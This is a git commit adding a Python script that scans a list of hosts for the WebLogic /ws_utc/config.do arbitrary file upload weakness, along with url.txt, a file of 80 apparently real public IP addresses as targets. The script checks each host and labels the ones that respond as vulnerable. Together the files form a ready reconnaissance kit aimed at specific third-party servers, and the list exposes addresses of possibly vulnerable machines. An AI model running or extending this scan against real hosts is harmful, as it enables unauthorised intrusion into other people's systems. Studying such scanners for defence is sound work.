Add files via upload

jiushill · web-flow · commit db6a776a3cc1 · 2018-07-19T18:41:25.000+08:00
diff --git a/WebLogic任意文件上传/Arbitrary_upload.py b/WebLogic任意文件上传/Arbitrary_upload.py
@@ -0,0 +1,38 @@
+import requests
+import threading
+import os
+
+error=['404','Not Found','找不到','安全狗','无权访问','403']
+ok=[]
+bad=[]
+def exploit():
+    headers={'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1'}
+    path='/ws_utc/config.do'
+    print('[+]Weblogic arbitrary file upload detection POC,data:https://mp.weixin.qq.com/s?__biz=MzIwMDk1MjMyMg==&mid=2247484311&idx=1&sn=14da21743a447449896292bb367a322e&chksm=96f41cfaa18395ec6182af2353ac55079ca9376ea8d2a2f8a1816c12e7e79b1081b0bc01d2fe&mpshare=1&scene=1&srcid=0719et8NMmpFCRlu8vcgqreh#rd')
+    user=input('Imported files:')
+    if os.path.exists(user):
+        print('[+]file {} ok'.format(user))
+    else:
+        print('[-]Not Found {}'.format(user))
+        exit()
+
+    ops=open('{}'.format(user),'r')
+    for o in ops.readlines():
+        sc="".join(o.split('\n'))
+        urls=sc+path
+        try:
+            reques=requests.get(url=urls,headers=headers,allow_redirects=False,timeout=3)
+            for e in error:
+                if reques.status_code==200 and e not in reques.text:
+                    pd='[+]debug url:{}'.format(sc)
+                    if pd in ok:continue
+                    ok.append(pd)
+                    print(pd)
+                else:
+                    nos='[-]Not debug url:{}'.format(sc)
+                    if nos in bad:continue
+                    bad.append(nos)
+                    print(nos)
+        except:
+            pass
+exploit()
diff --git a/WebLogic任意文件上传/url.txt b/WebLogic任意文件上传/url.txt
@@ -0,0 +1,80 @@
+http://84.241.52.110
+http://125.32.26.211
+http://61.142.172.82
+http://67.222.214.4
+http://178.252.189.213
+http://2.181.0.158
+http://217.219.180.112
+http://125.76.225.169
+http://125.215.37.217
+http://59.59.55.202
+http://114.251.203.84
+http://194.150.11.114
+http://202.108.145.132
+http://195.170.181.13
+http://125.32.26.220
+http://217.194.215.238
+http://67.222.214.22
+http://194.72.112.140
+http://118.178.173.191
+http://123.173.79.128
+http://113.207.120.141
+http://130.211.128.153
+http://194.72.112.217
+http://194.72.112.194
+http://125.32.98.106
+http://194.72.112.205
+http://113.204.205.237
+http://202.199.96.30
+http://113.196.174.152
+http://118.31.166.124
+http://194.72.112.143
+http://84.241.29.230
+http://195.69.154.135
+http://66.155.98.1
+http://193.219.96.212
+http://194.72.112.150
+http://125.64.214.186
+http://50.19.36.187
+http://50.20.225.214
+http://195.33.241.77
+http://125.32.98.116
+http://202.111.196.29
+http://67.192.223.199
+http://195.249.180.16
+http://66.77.93.246
+http://218.66.66.252
+http://79.173.252.6
+http://111.17.183.219
+http://190.216.234.26
+http://1.202.242.118
+http://66.94.18.106
+http://210.125.12.34
+http://59.151.126.80
+http://194.72.112.142
+http://38.101.225.137
+http://89.221.83.10
+http://88.204.202.126
+http://194.72.112.216
+http://60.217.100.102
+http://125.46.2.23
+http://190.60.31.181
+http://194.72.112.177
+http://202.98.11.192
+http://130.61.12.251
+http://111.235.156.218
+http://108.4.139.153
+http://112.35.18.211
+http://66.209.78.219
+http://2.185.214.28
+http://38.110.99.22
+http://38.101.225.136
+http://194.72.112.167
+http://183.233.176.96
+http://210.51.22.239
+http://194.72.112.246
+http://61.135.227.115
+http://123.124.131.199
+http://85.132.77.97
+http://175.100.138.13
+http://66.191.146.99
